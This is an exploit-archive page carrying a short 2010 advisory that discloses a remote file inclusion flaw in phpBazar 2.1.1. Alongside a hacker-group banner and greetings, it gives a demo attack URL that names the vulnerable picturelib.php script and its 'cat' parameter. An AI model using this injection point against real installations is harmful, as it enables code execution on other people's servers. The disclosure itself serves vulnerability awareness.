exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

phpBazar 2.1.1 Remote File Inclusion

phpBazar 2.1.1 Remote File Inclusion
Posted Jun 4, 2010
Authored by Sid3 effects

phpBazar version 2.1.1 suffers from a remote file inclusion vulnerability.

tags | exploit, remote, code execution, file inclusion
SHA-256 | 929583e27d1b46b5b61c3306d04478de276377bfaa87c9eaec8a528e29cd83f5

phpBazar 2.1.1 Remote File Inclusion

Change Mirror Download
# Title: phpBazar V2.1.1 stable rfi Vulnerability 
# Author: Sid3^effects
# Published: 2010-06-03
# Verison: 2.1.1 stable
# vendor: SmartISoft




ooooo .oooooo. oooooo oooooo oooo

`888' d8P' `Y8b `888. `888. .8'

888 888 `888. .8888. .8'

888 888 `888 .8'`888. .8'

888 888 `888.8' `888.8'

888 `88b ooo `888' `888'

o888o `Y8bood8P' `8' `8'



--------------------------------------------------------------------------------------

#####################Sid3^effects aKa HaRi##################################

#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors]

#Thanks:*L0rd ÇrusAdêr*,d4rk-blu™®,R45C4L idi0th4ck3r,CR4C|< 008,M4n0j,MaYuR

#ShouTZ:kedar,dec0d3r,41.w4r10r

#Catch us at www.andhrahackers.com or www.teamicw.in

############################################################################



Description :

phpBazar is a PHP/MySQL-based higly customizable template-driven classified ad script. Features: Install tool, Multi-languare support, Easy configuration via CSS, User management, Ad pictures stored in MySQL or text file, Ad attachments, Unlimited categories, Structured category display, Picture display, WebMail, Send URL-refer, My ad entries, My ad favorites, Search engine, Ad rating, CatNotify, Expired ads notification, Ad-of-the-Day, Flood protection, Member list/search/details, IP-logging/banning, E-mail and username banning, Dirty and long word filter, Admin ad-approval, Web admin panel, Useronline, and more. Includes guestbook, voting script and Forum & Chat interface. English, German and French languages incl. Also available are picture library, sales, and chat options

############################################################################

The older versions of phpBazar had many vulnerabilities and the latest verion of phpBazar V2.1.1 stable has got rfi bug

Xploit :

demo url:http://www.phpbazar.com/bazar/picturelib.php?cat=[RFI]

############################################################################

#Sid3^effects








Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close